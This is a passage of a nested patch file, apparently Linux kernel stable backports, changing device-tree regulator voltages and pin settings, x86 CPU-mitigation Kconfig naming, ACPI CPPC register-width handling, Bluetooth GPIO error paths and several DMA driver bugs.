+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+@@ -930,7 +930,7 @@ regulators {
+ 			mt6315_7_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+-				regulator-min-microvolt = <606250>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <800000>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 4ed8a0f187583..7ecba8c7262da 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -1240,6 +1240,7 @@ mutex: mutex@14001000 {
+ 			reg = <0 0x14001000 0 0x1000>;
+ 			interrupts = <GIC_SPI 252 IRQ_TYPE_LEVEL_HIGH 0>;
+ 			clocks = <&mmsys CLK_MM_DISP_MUTEX0>;
++			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
+ 			mediatek,gce-events = <CMDQ_EVENT_DISP_STREAM_DONE_ENG_EVENT_0>,
+ 					      <CMDQ_EVENT_DISP_STREAM_DONE_ENG_EVENT_1>;
+ 			power-domains = <&spm MT8192_POWER_DOMAIN_DISP>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+index 4b8a1c462906e..9180a73db066e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+@@ -845,7 +845,7 @@ regulators {
+ 			mt6315_6_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vbcpu";
+-				regulator-min-microvolt = <300000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-ramp-delay = <6250>;
+@@ -863,7 +863,7 @@ regulators {
+ 			mt6315_7_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+-				regulator-min-microvolt = <625000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-ramp-delay = <6250>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 414cbe3451270..bdf002e9cece1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -1492,6 +1492,7 @@ vppsys0: clock-controller@14000000 {
+ 			compatible = "mediatek,mt8195-vppsys0";
+ 			reg = <0 0x14000000 0 0x1000>;
+ 			#clock-cells = <1>;
++			mediatek,gce-client-reg = <&gce1 SUBSYS_1400XXXX 0 0x1000>;
+ 		};
+ 
+ 		smi_sub_common_vpp0_vpp1_2x1: smi@14010000 {
+@@ -1597,6 +1598,7 @@ vppsys1: clock-controller@14f00000 {
+ 			compatible = "mediatek,mt8195-vppsys1";
+ 			reg = <0 0x14f00000 0 0x1000>;
+ 			#clock-cells = <1>;
++			mediatek,gce-client-reg = <&gce1 SUBSYS_14f0XXXX 0 0x1000>;
+ 		};
+ 
+ 		larb5: larb@14f02000 {
+@@ -1982,6 +1984,7 @@ vdosys0: syscon@1c01a000 {
+ 			reg = <0 0x1c01a000 0 0x1000>;
+ 			mboxes = <&gce0 0 CMDQ_THR_PRIO_4>;
+ 			#clock-cells = <1>;
++			mediatek,gce-client-reg = <&gce0 SUBSYS_1c01XXXX 0xa000 0x1000>;
+ 		};
+ 
+ 		larb20: larb@1b010000 {
+@@ -2085,6 +2088,7 @@ mutex: mutex@1c016000 {
+ 			interrupts = <GIC_SPI 658 IRQ_TYPE_LEVEL_HIGH 0>;
+ 			power-domains = <&spm MT8195_POWER_DOMAIN_VDOSYS0>;
+ 			clocks = <&vdosys0 CLK_VDO0_DISP_MUTEX0>;
++			mediatek,gce-client-reg = <&gce0 SUBSYS_1c01XXXX 0x6000 0x1000>;
+ 			mediatek,gce-events = <CMDQ_EVENT_VDO0_DISP_STREAM_DONE_0>;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts b/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts
+index 194e48c755f6b..a51e8d0493cab 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-pinebook-pro.dts
+@@ -789,7 +789,6 @@ &pcie_phy {
+ };
+ 
+ &pcie0 {
+-	bus-scan-delay-ms = <1000>;
+ 	ep-gpios = <&gpio2 RK_PD4 GPIO_ACTIVE_HIGH>;
+ 	num-lanes = <4>;
+ 	pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+index aa3e21bd6c8f4..937a15005eb0e 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-puma.dtsi
+@@ -401,16 +401,22 @@ &io_domains {
+ 	gpio1830-supply = <&vcc_1v8>;
+ };
+ 
+-&pmu_io_domains {
+-	status = "okay";
+-	pmu1830-supply = <&vcc_1v8>;
+-};
+-
+-&pwm2 {
+-	status = "okay";
++&pcie_clkreqn_cpm {
++	rockchip,pins =
++		<2 RK_PD2 RK_FUNC_GPIO &pcfg_pull_up>;
+ };
+ 
+ &pinctrl {
++	pinctrl-names = "default";
++	pinctrl-0 = <&q7_thermal_pin>;
++
++	gpios {
++		q7_thermal_pin: q7-thermal-pin {
++			rockchip,pins =
++				<0 RK_PA3 RK_FUNC_GPIO &pcfg_pull_up>;
++		};
++	};
++
+ 	i2c8 {
+ 		i2c8_xfer_a: i2c8-xfer {
+ 			rockchip,pins =
+@@ -443,11 +449,20 @@ vcc5v0_host_en: vcc5v0-host-en {
+ 	usb3 {
+ 		usb3_id: usb3-id {
+ 			rockchip,pins =
+-			  <1 RK_PC2 RK_FUNC_GPIO &pcfg_pull_none>;
++			  <1 RK_PC2 RK_FUNC_GPIO &pcfg_pull_up>;
+ 		};
+ 	};
+ };
+ 
++&pmu_io_domains {
++	status = "okay";
++	pmu1830-supply = <&vcc_1v8>;
++};
++
++&pwm2 {
++	status = "okay";
++};
++
+ &sdhci {
+ 	/*
+ 	 * Signal integrity isn't great at 200MHz but 100MHz has proven stable
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts b/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts
+index 26d7fda275edb..856fe4b66a0b9 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-bpi-r2-pro.dts
+@@ -412,6 +412,8 @@ regulator-state-mem {
+ 
+ 			vccio_sd: LDO_REG5 {
+ 				regulator-name = "vccio_sd";
++				regulator-always-on;
++				regulator-boot-on;
+ 				regulator-min-microvolt = <1800000>;
+ 				regulator-max-microvolt = <3300000>;
+ 
+@@ -521,9 +523,9 @@ &mdio0 {
+ 	#address-cells = <1>;
+ 	#size-cells = <0>;
+ 
+-	switch@0 {
++	switch@1f {
+ 		compatible = "mediatek,mt7531";
+-		reg = <0>;
++		reg = <0x1f>;
+ 
+ 		ports {
+ 			#address-cells = <1>;
+diff --git a/arch/loongarch/include/asm/perf_event.h b/arch/loongarch/include/asm/perf_event.h
+index 2a35a0bc2aaab..52b638059e40b 100644
+--- a/arch/loongarch/include/asm/perf_event.h
++++ b/arch/loongarch/include/asm/perf_event.h
+@@ -7,6 +7,14 @@
+ #ifndef __LOONGARCH_PERF_EVENT_H__
+ #define __LOONGARCH_PERF_EVENT_H__
+ 
++#include <asm/ptrace.h>
++
+ #define perf_arch_bpf_user_pt_regs(regs) (struct user_pt_regs *)regs
+ 
++#define perf_arch_fetch_caller_regs(regs, __ip) { \
++	(regs)->csr_era = (__ip); \
++	(regs)->regs[3] = current_stack_pointer; \
++	(regs)->regs[22] = (unsigned long) __builtin_frame_address(0); \
++}
++
+ #endif /* __LOONGARCH_PERF_EVENT_H__ */
+diff --git a/arch/loongarch/mm/fault.c b/arch/loongarch/mm/fault.c
+index b829ab911a17b..007718d51f095 100644
+--- a/arch/loongarch/mm/fault.c
++++ b/arch/loongarch/mm/fault.c
+@@ -193,10 +193,10 @@ static void __kprobes __do_page_fault(struct pt_regs *regs,
+ 		if (!(vma->vm_flags & VM_WRITE))
+ 			goto bad_area;
+ 	} else {
+-		if (!(vma->vm_flags & VM_READ) && address != exception_era(regs))
+-			goto bad_area;
+ 		if (!(vma->vm_flags & VM_EXEC) && address == exception_era(regs))
+ 			goto bad_area;
++		if (!(vma->vm_flags & (VM_READ | VM_WRITE)) && address != exception_era(regs))
++			goto bad_area;
+ 	}
+ 
+ 	/*
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 63055c6ad2c25..2d9416a6a070e 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -799,8 +799,8 @@ static inline pmd_t pmdp_establish(struct vm_area_struct *vma,
+ #define PAGE_SHARED		__pgprot(0)
+ #define PAGE_KERNEL		__pgprot(0)
+ #define swapper_pg_dir		NULL
+-#define TASK_SIZE		0xffffffffUL
+-#define VMALLOC_START		0
++#define TASK_SIZE		_AC(-1, UL)
++#define VMALLOC_START		_AC(0, UL)
+ #define VMALLOC_END		TASK_SIZE
+ 
+ #endif /* !CONFIG_MMU */
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 5f7a86f240db7..49cea5b81649d 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -61,6 +61,7 @@ config X86
+ 	select ACPI_SYSTEM_POWER_STATES_SUPPORT	if ACPI
+ 	select ARCH_32BIT_OFF_T			if X86_32
+ 	select ARCH_CLOCKSOURCE_INIT
++	select ARCH_CONFIGURES_CPU_MITIGATIONS
+ 	select ARCH_CORRECT_STACKTRACE_ON_KRETPROBE
+ 	select ARCH_ENABLE_HUGEPAGE_MIGRATION if X86_64 && HUGETLB_PAGE && MIGRATION
+ 	select ARCH_ENABLE_MEMORY_HOTPLUG if X86_64
+@@ -2449,17 +2450,17 @@ config CC_HAS_SLS
+ config CC_HAS_RETURN_THUNK
+ 	def_bool $(cc-option,-mfunction-return=thunk-extern)
+ 
+-menuconfig SPECULATION_MITIGATIONS
+-	bool "Mitigations for speculative execution vulnerabilities"
++menuconfig CPU_MITIGATIONS
++	bool "Mitigations for CPU vulnerabilities"
+ 	default y
+ 	help
+-	  Say Y here to enable options which enable mitigations for
+-	  speculative execution hardware vulnerabilities.
++	  Say Y here to enable options which enable mitigations for hardware
++	  vulnerabilities (usually related to speculative execution).
+ 
+ 	  If you say N, all mitigations will be disabled. You really
+ 	  should know what you are doing to say so.
+ 
+-if SPECULATION_MITIGATIONS
++if CPU_MITIGATIONS
+ 
+ config PAGE_TABLE_ISOLATION
+ 	bool "Remove the kernel mapping in user mode"
+diff --git a/arch/x86/include/asm/coco.h b/arch/x86/include/asm/coco.h
+index 1f97d00ad8588..100a752c33bb3 100644
+--- a/arch/x86/include/asm/coco.h
++++ b/arch/x86/include/asm/coco.h
+@@ -13,9 +13,10 @@ enum cc_vendor {
+ };
+ 
+ extern enum cc_vendor cc_vendor;
+-extern u64 cc_mask;
+ 
+ #ifdef CONFIG_ARCH_HAS_CC_PLATFORM
++extern u64 cc_mask;
++
+ static inline void cc_set_mask(u64 mask)
+ {
+ 	RIP_REL_REF(cc_mask) = mask;
+@@ -25,6 +26,8 @@ u64 cc_mkenc(u64 val);
+ u64 cc_mkdec(u64 val);
+ void cc_random_init(void);
+ #else
++static const u64 cc_mask = 0;
++
+ static inline u64 cc_mkenc(u64 val)
+ {
+ 	return val;
+diff --git a/arch/x86/include/asm/pgtable_types.h b/arch/x86/include/asm/pgtable_types.h
+index f6116b66f2892..f0b9b37c4609b 100644
+--- a/arch/x86/include/asm/pgtable_types.h
++++ b/arch/x86/include/asm/pgtable_types.h
+@@ -127,7 +127,7 @@
+  */
+ #define _COMMON_PAGE_CHG_MASK	(PTE_PFN_MASK | _PAGE_PCD | _PAGE_PWT |	       \
+ 				 _PAGE_SPECIAL | _PAGE_ACCESSED | _PAGE_DIRTY |\
+-				 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_ENC | \
++				 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_CC | \
+ 				 _PAGE_UFFD_WP)
+ #define _PAGE_CHG_MASK	(_COMMON_PAGE_CHG_MASK | _PAGE_PAT)
+ #define _HPAGE_CHG_MASK (_COMMON_PAGE_CHG_MASK | _PAGE_PSE | _PAGE_PAT_LARGE)
+@@ -153,6 +153,7 @@ enum page_cache_mode {
+ };
+ #endif
+ 
++#define _PAGE_CC		(_AT(pteval_t, cc_mask))
+ #define _PAGE_ENC		(_AT(pteval_t, sme_me_mask))
+ 
+ #define _PAGE_CACHE_MASK	(_PAGE_PWT | _PAGE_PCD | _PAGE_PAT)
+diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
+index 7f94dbbc397b7..a0d3059bee3de 100644
+--- a/arch/x86/kernel/process_64.c
++++ b/arch/x86/kernel/process_64.c
+@@ -137,7 +137,7 @@ void __show_regs(struct pt_regs *regs, enum show_regs_mode mode,
+ 		       log_lvl, d3, d6, d7);
+ 	}
+ 
+-	if (cpu_feature_enabled(X86_FEATURE_OSPKE))
++	if (cr4 & X86_CR4_PKE)
+ 		printk("%sPKRU: %08x\n", log_lvl, read_pkru());
+ }
+ 
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index c73d1359b9d41..5dc9ccdd5a510 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -290,7 +290,6 @@ static struct crypto_larval *__crypto_register_alg(struct crypto_alg *alg)
+ 		}
+ 
+ 		if (!strcmp(q->cra_driver_name, alg->cra_name) ||
+-		    !strcmp(q->cra_driver_name, alg->cra_driver_name) ||
+ 		    !strcmp(q->cra_name, alg->cra_driver_name))
+ 			goto err;
+ 	}
+diff --git a/drivers/acpi/cppc_acpi.c b/drivers/acpi/cppc_acpi.c
+index 093675b1a1ffb..49339f37d9405 100644
+--- a/drivers/acpi/cppc_acpi.c
++++ b/drivers/acpi/cppc_acpi.c
+@@ -163,6 +163,13 @@ show_cppc_data(cppc_get_perf_caps, cppc_perf_caps, nominal_freq);
+ show_cppc_data(cppc_get_perf_ctrs, cppc_perf_fb_ctrs, reference_perf);
+ show_cppc_data(cppc_get_perf_ctrs, cppc_perf_fb_ctrs, wraparound_time);
+ 
++/* Check for valid access_width, otherwise, fallback to using bit_width */
++#define GET_BIT_WIDTH(reg) ((reg)->access_width ? (8 << ((reg)->access_width - 1)) : (reg)->bit_width)
++
++/* Shift and apply the mask for CPC reads/writes */
++#define MASK_VAL(reg, val) (((val) >> (reg)->bit_offset) & 			\
++					GENMASK(((reg)->bit_width) - 1, 0))
++
+ static ssize_t show_feedback_ctrs(struct kobject *kobj,
+ 		struct kobj_attribute *attr, char *buf)
+ {
+@@ -776,6 +783,7 @@ int acpi_cppc_processor_probe(struct acpi_processor *pr)
+ 			} else if (gas_t->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY) {
+ 				if (gas_t->address) {
+ 					void __iomem *addr;
++					size_t access_width;
+ 
+ 					if (!osc_cpc_flexible_adr_space_confirmed) {
+ 						pr_debug("Flexible address space capability not supported\n");
+@@ -783,7 +791,8 @@ int acpi_cppc_processor_probe(struct acpi_processor *pr)
+ 							goto out_free;
+ 					}
+ 
+-					addr = ioremap(gas_t->address, gas_t->bit_width/8);
++					access_width = GET_BIT_WIDTH(gas_t) / 8;
++					addr = ioremap(gas_t->address, access_width);
+ 					if (!addr)
+ 						goto out_free;
+ 					cpc_ptr->cpc_regs[i-2].sys_mem_vaddr = addr;
+@@ -979,6 +988,7 @@ int __weak cpc_write_ffh(int cpunum, struct cpc_reg *reg, u64 val)
+ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ {
+ 	void __iomem *vaddr = NULL;
++	int size;
+ 	int pcc_ss_id = per_cpu(cpu_pcc_subspace_idx, cpu);
+ 	struct cpc_reg *reg = &reg_res->cpc_entry.reg;
+ 
+@@ -988,14 +998,14 @@ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ 	}
+ 
+ 	*val = 0;
++	size = GET_BIT_WIDTH(reg);
+ 
+ 	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_IO) {
+-		u32 width = 8 << (reg->access_width - 1);
+ 		u32 val_u32;
+ 		acpi_status status;
+ 
+ 		status = acpi_os_read_port((acpi_io_address)reg->address,
+-					   &val_u32, width);
++					   &val_u32, size);
+ 		if (ACPI_FAILURE(status)) {
+ 			pr_debug("Error: Failed to read SystemIO port %llx\n",
+ 				 reg->address);
+@@ -1004,17 +1014,24 @@ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ 
+ 		*val = val_u32;
+ 		return 0;
+-	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0)
++	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0) {
++		/*
++		 * For registers in PCC space, the register size is determined
++		 * by the bit width field; the access size is used to indicate
++		 * the PCC subspace id.
++		 */
++		size = reg->bit_width;
+ 		vaddr = GET_PCC_VADDR(reg->address, pcc_ss_id);
++	}
+ 	else if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
+ 		vaddr = reg_res->sys_mem_vaddr;
+ 	else if (reg->space_id == ACPI_ADR_SPACE_FIXED_HARDWARE)
+ 		return cpc_read_ffh(cpu, reg, val);
+ 	else
+ 		return acpi_os_read_memory((acpi_physical_address)reg->address,
+-				val, reg->bit_width);
++				val, size);
+ 
+-	switch (reg->bit_width) {
++	switch (size) {
+ 	case 8:
+ 		*val = readb_relaxed(vaddr);
+ 		break;
+@@ -1028,27 +1045,37 @@ static int cpc_read(int cpu, struct cpc_register_resource *reg_res, u64 *val)
+ 		*val = readq_relaxed(vaddr);
+ 		break;
+ 	default:
+-		pr_debug("Error: Cannot read %u bit width from PCC for ss: %d\n",
+-			 reg->bit_width, pcc_ss_id);
++		if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY) {
++			pr_debug("Error: Cannot read %u bit width from system memory: 0x%llx\n",
++				size, reg->address);
++		} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM) {
++			pr_debug("Error: Cannot read %u bit width from PCC for ss: %d\n",
++				size, pcc_ss_id);
++		}
+ 		return -EFAULT;
+ 	}
+ 
++	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
++		*val = MASK_VAL(reg, *val);
++
+ 	return 0;
+ }
+ 
+ static int cpc_write(int cpu, struct cpc_register_resource *reg_res, u64 val)
+ {
+ 	int ret_val = 0;
++	int size;
+ 	void __iomem *vaddr = NULL;
+ 	int pcc_ss_id = per_cpu(cpu_pcc_subspace_idx, cpu);
+ 	struct cpc_reg *reg = &reg_res->cpc_entry.reg;
+ 
++	size = GET_BIT_WIDTH(reg);
++
+ 	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_IO) {
+-		u32 width = 8 << (reg->access_width - 1);
+ 		acpi_status status;
+ 
+ 		status = acpi_os_write_port((acpi_io_address)reg->address,
+-					    (u32)val, width);
++					    (u32)val, size);
+ 		if (ACPI_FAILURE(status)) {
+ 			pr_debug("Error: Failed to write SystemIO port %llx\n",
+ 				 reg->address);
+@@ -1056,17 +1083,27 @@ static int cpc_write(int cpu, struct cpc_register_resource *reg_res, u64 val)
+ 		}
+ 
+ 		return 0;
+-	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0)
++	} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM && pcc_ss_id >= 0) {
++		/*
++		 * For registers in PCC space, the register size is determined
++		 * by the bit width field; the access size is used to indicate
++		 * the PCC subspace id.
++		 */
++		size = reg->bit_width;
+ 		vaddr = GET_PCC_VADDR(reg->address, pcc_ss_id);
++	}
+ 	else if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
+ 		vaddr = reg_res->sys_mem_vaddr;
+ 	else if (reg->space_id == ACPI_ADR_SPACE_FIXED_HARDWARE)
+ 		return cpc_write_ffh(cpu, reg, val);
+ 	else
+ 		return acpi_os_write_memory((acpi_physical_address)reg->address,
+-				val, reg->bit_width);
++				val, size);
++
++	if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY)
++		val = MASK_VAL(reg, val);
+ 
+-	switch (reg->bit_width) {
++	switch (size) {
+ 	case 8:
+ 		writeb_relaxed(val, vaddr);
+ 		break;
+@@ -1080,8 +1117,13 @@ static int cpc_write(int cpu, struct cpc_register_resource *reg_res, u64 val)
+ 		writeq_relaxed(val, vaddr);
+ 		break;
+ 	default:
+-		pr_debug("Error: Cannot write %u bit width to PCC for ss: %d\n",
+-			 reg->bit_width, pcc_ss_id);
++		if (reg->space_id == ACPI_ADR_SPACE_SYSTEM_MEMORY) {
++			pr_debug("Error: Cannot write %u bit width to system memory: 0x%llx\n",
++				size, reg->address);
++		} else if (reg->space_id == ACPI_ADR_SPACE_PLATFORM_COMM) {
++			pr_debug("Error: Cannot write %u bit width to PCC for ss: %d\n",
++				size, pcc_ss_id);
++		}
+ 		ret_val = -EFAULT;
+ 		break;
+ 	}
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 954f7f3b5cc30..6a772b955d69d 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -535,6 +535,8 @@ static const struct usb_device_id blacklist_table[] = {
+ 	/* Realtek 8852BE Bluetooth devices */
+ 	{ USB_DEVICE(0x0cb8, 0xc559), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x0bda, 0x4853), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
+ 	{ USB_DEVICE(0x0bda, 0x887b), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 	{ USB_DEVICE(0x0bda, 0xb85b), .driver_info = BTUSB_REALTEK |
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 33956ddec9337..179278b801eb3 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1645,6 +1645,9 @@ static bool qca_wakeup(struct hci_dev *hdev)
+ 	struct hci_uart *hu = hci_get_drvdata(hdev);
+ 	bool wakeup;
+ 
++	if (!hu->serdev)
++		return true;
++
+ 	/* BT SoC attached through the serial bus is handled by the serdev driver.
+ 	 * So we need to use the device handle of the serdev driver to get the
+ 	 * status of device may wakeup.
+@@ -2257,16 +2260,21 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855)) {
+ 			dev_err(&serdev->dev, "failed to acquire BT_EN gpio\n");
+-			power_ctrl_enabled = false;
++			return PTR_ERR(qcadev->bt_en);
+ 		}
+ 
++		if (!qcadev->bt_en)
++			power_ctrl_enabled = false;
++
+ 		qcadev->sw_ctrl = devm_gpiod_get_optional(&serdev->dev, "swctrl",
+ 					       GPIOD_IN);
+ 		if (IS_ERR(qcadev->sw_ctrl) &&
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855 ||
+-		     data->soc_type == QCA_WCN7850))
+-			dev_warn(&serdev->dev, "failed to acquire SW_CTRL gpio\n");
++		     data->soc_type == QCA_WCN7850)) {
++			dev_err(&serdev->dev, "failed to acquire SW_CTRL gpio\n");
++			return PTR_ERR(qcadev->sw_ctrl);
++		}
+ 
+ 		qcadev->susclk = devm_clk_get_optional(&serdev->dev, NULL);
+ 		if (IS_ERR(qcadev->susclk)) {
+@@ -2285,10 +2293,13 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+ 		if (IS_ERR(qcadev->bt_en)) {
+-			dev_warn(&serdev->dev, "failed to acquire enable gpio\n");
+-			power_ctrl_enabled = false;
++			dev_err(&serdev->dev, "failed to acquire enable gpio\n");
++			return PTR_ERR(qcadev->bt_en);
+ 		}
+ 
++		if (!qcadev->bt_en)
++			power_ctrl_enabled = false;
++
+ 		qcadev->susclk = devm_clk_get_optional(&serdev->dev, NULL);
+ 		if (IS_ERR(qcadev->susclk)) {
+ 			dev_warn(&serdev->dev, "failed to acquire clk\n");
+diff --git a/drivers/dma/idma64.c b/drivers/dma/idma64.c
+index f4c07ad3be15b..af8777a1ec2e3 100644
+--- a/drivers/dma/idma64.c
++++ b/drivers/dma/idma64.c
+@@ -167,6 +167,10 @@ static irqreturn_t idma64_irq(int irq, void *dev)
+ 	u32 status_err;
+ 	unsigned short i;
+ 
++	/* Since IRQ may be shared, check if DMA controller is powered on */
++	if (status == GENMASK(31, 0))
++		return IRQ_NONE;
++
+ 	dev_vdbg(idma64->dma.dev, "%s: status=%#x\n", __func__, status);
+ 
+ 	/* Check if we have any interrupt from the DMA controller */
+diff --git a/drivers/dma/idxd/perfmon.c b/drivers/dma/idxd/perfmon.c
+index d73004f47cf4b..612ef13b71603 100644
+--- a/drivers/dma/idxd/perfmon.c
++++ b/drivers/dma/idxd/perfmon.c
+@@ -529,14 +529,11 @@ static int perf_event_cpu_offline(unsigned int cpu, struct hlist_node *node)
+ 		return 0;
+ 
+ 	target = cpumask_any_but(cpu_online_mask, cpu);
+-
+ 	/* migrate events if there is a valid target */
+-	if (target < nr_cpu_ids)
++	if (target < nr_cpu_ids) {
+ 		cpumask_set_cpu(target, &perfmon_dsa_cpu_mask);
+-	else
+-		target = -1;
+-
+-	perf_pmu_migrate_context(&idxd_pmu->pmu, cpu, target);
++		perf_pmu_migrate_context(&idxd_pmu->pmu, cpu, target);
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/dma/owl-dma.c b/drivers/dma/owl-dma.c
+index b6e0ac8314e5c..0819f19c87cc5 100644
+--- a/drivers/dma/owl-dma.c
++++ b/drivers/dma/owl-dma.c
+@@ -249,7 +249,7 @@ static void pchan_update(struct owl_dma_pchan *pchan, u32 reg,
+ 	else
+ 		regval &= ~val;
+ 
+-	writel(val, pchan->base + reg);
++	writel(regval, pchan->base + reg);
+ }
+ 
+ static void pchan_writel(struct owl_dma_pchan *pchan, u32 reg, u32 data)
+@@ -273,7 +273,7 @@ static void dma_update(struct owl_dma *od, u32 reg, u32 val, bool state)
+ 	else
+ 		regval &= ~val;
+ 
+-	writel(val, od->base + reg);
++	writel(regval, od->base + reg);
+ }
+ 
+ static void dma_writel(struct owl_dma *od, u32 reg, u32 data)
+diff --git a/drivers/dma/tegra186-gpc-dma.c b/drivers/dma/tegra186-gpc-dma.c
+index 75af3488a3baf..e70b7c41dcab7 100644
+--- a/drivers/dma/tegra186-gpc-dma.c
++++ b/drivers/dma/tegra186-gpc-dma.c
+@@ -742,6 +742,9 @@ static int tegra_dma_get_residual(struct tegra_dma_channel *tdc)
+ 	bytes_xfer = dma_desc->bytes_xfer +
+ 		     sg_req[dma_desc->sg_idx].len - (wcount * 4);
+ 
++	if (dma_desc->bytes_req == bytes_xfer)
++		return 0;
++
+ 	residual = dma_desc->bytes_req - (bytes_xfer % dma_desc->bytes_req);
+ 
+ 	return residual;
+diff --git a/drivers/dma/xilinx/xilinx_dpdma.c b/drivers/dma/xilinx/xilinx_dpdma.c
+index 84dc5240a8074..93938ed80fc83 100644
+--- a/drivers/dma/xilinx/xilinx_dpdma.c
++++ b/drivers/dma/xilinx/xilinx_dpdma.c
+@@ -214,7 +214,8 @@ struct xilinx_dpdma_tx_desc {
+  * @running: true if the channel is running
+  * @first_frame: flag for the first frame of stream
+  * @video_group: flag if multi-channel operation is needed for video channels
+- * @lock: lock to access struct xilinx_dpdma_chan
++ * @lock: lock to access struct xilinx_dpdma_chan. Must be taken before
++ *        @vchan.lock, if both are to be held.
+  * @desc_pool: descriptor allocation pool
+  * @err_task: error IRQ bottom half handler
+  * @desc: References to descriptors being processed
+@@ -1097,12 +1098,14 @@ static void xilinx_dpdma_chan_vsync_irq(struct  xilinx_dpdma_chan *chan)
+ 	 * Complete the active descriptor, if any, promote the pending
+ 	 * descriptor to active, and queue the next transfer, if any.
+ 	 */
++	spin_lock(&chan->vchan.lock);
+ 	if (chan->desc.active)
+ 		vchan_cookie_complete(&chan->desc.active->vdesc);
+ 	chan->desc.active = pending;
+ 	chan->desc.pending = NULL;
+ 
+ 	xilinx_dpdma_chan_queue_transfer(chan);
++	spin_unlock(&chan->vchan.lock);
+ 
+ out:
+ 	spin_unlock_irqrestore(&chan->lock, flags);
+@@ -1264,10 +1267,12 @@ static void xilinx_dpdma_issue_pending(struct dma_chan *dchan)
+ 	struct xilinx_dpdma_chan *chan = to_xilinx_chan(dchan);
+ 	unsigned long flags;
+ 
